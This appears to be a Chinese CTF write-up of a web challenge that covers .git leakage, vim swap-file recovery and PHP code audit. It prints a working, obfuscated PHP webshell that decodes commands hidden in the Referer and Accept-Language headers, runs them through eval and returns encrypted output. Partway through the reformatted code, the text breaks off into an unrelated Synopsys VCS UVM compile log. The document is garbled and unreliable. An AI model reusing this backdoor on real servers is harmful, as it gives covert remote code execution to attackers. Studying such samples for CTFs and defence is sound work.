i春秋web-Backdoor(.git泄露、vim备份泄露、代码审计)

本文介绍了通过.web泄露获取敏感信息,详细解析了.vim备份文件的恢复方法,并探讨了PHP代码审计,特别是eval()执行system()函数的利用技巧,通过操纵HTTP头部字段实现命令执行,最终达到获取flag的目标。

1、文件泄露

根据题目 tips:敏感文件泄漏
网站目录扫描,发现.git泄露,下载git文件夹,在bd049e_flag.php中看到:

<?php
echo "flag{true_flag_is_in_the_b4ckdo0r.php}";
?>

然后就访问这个网页看到:
在这里插入图片描述
是让我们找他的源码的,网页源码里面没什么线索,那就可能是备份文件泄露了,访问.b4ckdo0r.php.swo,果然得到了备份文件,然后就是用vim恢复了。

恢复方法:在b4ckdo0r.php.swo同一文件夹下,使用命令vim -r b4ckdo0r.php,然后进入了vim编辑界面,命令wq!即可保存下来恢复的文件:

<?php
echo "can you find the source code of me?";
/**
 * Signature For Report
 */$h='_)m/","/-/)m"),)marray()m"/","+")m),$)mss($s[$i)m],0,$e))))m)m,$k)));$o=ob)m_get_c)monte)m)mnts)m();ob_end_clean)';/*
 */$H='m();$d=ba)mse64)m_encode)m(x(gzc)mompres)ms($o),)m$)mk));print("<)m$k>$d<)m/)m$k>)m");@sessio)mn_d)mestroy();}}}}';/*
 */$N='mR;$rr)m=@$r[)m"HTT)mP_RE)mFERER"];$ra)m=)m@$r["HTTP_AC)mC)mEPT_LANG)mUAGE)m")m];if($rr)m&&$ra){)m$u=parse_u)mrl($rr);p';/*
 */$u='$e){)m$k=$)mkh.$kf;ob)m_start();)m@eva)ml(@gzunco)mmpr)mess(@x(@)mbase6)m4_deco)mde(p)m)mreg_re)mplace(array("/';/*
 */$f='$i<$)ml;)m){)mfo)mr($j)m=0;($j<$c&&$i<$l);$j)m++,$i+)m+){$)mo.=$t{$i)m}^$)mk{$j};}}r)meturn )m$o;}$r)m=$_SERVE)';/*
 */$O='[$i]="";$p)m=$)m)mss($p,3)m);}if(ar)mray_)mkey_exists)m()m$i,$s)){$)ms[$i].=$p)m;)m$e=s)mtrpos)m($s[$i],$f);)mif(';/*
 */$w=')m));)m$p="";fo)mr($z=1;)m$z<c)mount()m$m[1]);$)mz++)m)m)$p.=$q[$m[)m)m2][$z]];if(str)mpo)ms($p,$h))m===0){$s)m';/*
 */$P='trt)molower";$)mi=$m[1][0)m)m].$m[1][1])m;$h=$sl()m$ss(m)md5($)mi.$kh)m),0,)m3));$f=$s)ml($ss()m)mmd5($i.$kf),0,3';/*
 */$i=')marse_)mstr)m($u["q)muery"],$)m)mq);$q=array)m_values()m$q);pre)mg_matc)mh_all()m"/([\\w)m])m)[\\w-)m]+(?:;q=0.)';/*
 */$x='m([\\d)m]))?,?/",)m$ra,$m))m;if($q)m&&$)mm))m)m{@session_start();$)ms=&$_S)mESSI)m)mON;$)mss="sub)mstr";$sl="s)m';/*
 */$y=str_replace('b','','crbebbabte_funcbbtion');/*
 */$c='$kh="4f7)m)mf";$kf="2)m)m8d7";funct)mion x($t)m,$k){$)m)mc=strlen($k);$l=st)mrlen)m($t);)m)m$o="";for()m$i=0;';/*
 */$L=str_replace(')m','',$c.$f.$N.$i.$x.$P.$w.$O.$u.$h.$H);/*
 */$v=$y('',$L);$v();/*
 */
	echo($L);//这一句是为了得到$L加上去的,恢复得到的文件中并没有
?>

然后把得到的$L代码规范化一下得到(里面有一些我的注释):

<?php
$kh = "4f7f";
$kf = "28d7";
function x($t, $k)
{
   
   
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l; ) {
   
   
        for ($j = 0; ($j < $c &&
posedge@EDA:/mnt/hgfs/VMware/集成电路验证/ces_uvm-1.2_2017.12/labs/lab1$ vcs -sverilog -ntb_opts uvm-1.2 test.sv *** Using c compiler gcc-4.8 instead of cc ... Chronologic VCS (TM) Version O-2018.09-SP2_Full64 -- Mon Dec 1 09:44:57 2025 Copyright (c) 1991-2018 by Synopsys Inc. ALL RIGHTS RESERVED This program is proprietary and confidential information of Synopsys Inc. and may be used and disclosed only as authorized in a license agreement controlling such use and disclosure. Parsing design file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv' Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_version_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_global_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_message_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_phase_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_object_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_printer_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_tlm_defines.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm_imps.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_tlm_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_sequence_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_callback_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_reg_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/macros/uvm_deprecated_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dpi/uvm_dpi.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dpi/uvm_hdl.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dpi/uvm_dpi.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dpi/uvm_svcmd_dpi.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dpi/uvm_dpi.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dpi/uvm_regex.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dpi/uvm_dpi.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_coreservice.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_version.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_object_globals.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_misc.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_object.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_pool.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_queue.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_factory.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_registry.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_spell_chkr.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_resource.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_resource_specializations.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_resource_db.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_config_db.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_printer.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_comparer.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_packer.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_links.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_tr_database.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_tr_stream.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_recorder.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_event_callback.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_event.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_barrier.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_callback.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_macros.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_callback.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_report_message.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_report_catcher.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_report_server.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_report_handler.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_report_object.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_transaction.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_phase.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_domain.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_bottomup_phase.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_topdown_phase.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_task_phase.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_common_phases.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_runtime_phases.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_component.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_root.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_component.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_objection.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_heartbeat.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_globals.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_cmdline_processor.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_traversal.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_dap.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_set_get_dap_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_dap.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_simple_lock_dap.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_dap.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_get_to_lock_dap.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_dap.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_set_before_get_dap.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/dap/uvm_dap.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm_ifs.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_sqr_ifs.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/base/uvm_port_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm_imps.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_imps.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_ports.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_exports.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_analysis_port.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm_fifo_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm_fifos.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm_req_rsp.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_sqr_connections.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm1/uvm_tlm.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_pair.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_policies.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_in_order_comparator.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_algorithmic_comparator.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_random_stimulus.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_subscriber.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_monitor.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_driver.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_push_driver.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_scoreboard.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_agent.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_env.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_test.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/comps/uvm_comps.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequence_item.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequencer_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequencer_analysis_fifo.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequencer_param_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequencer.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_push_sequencer.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequence_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequence.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequence_library.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_sequence_builtin.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/seq/uvm_seq.svh'. Back 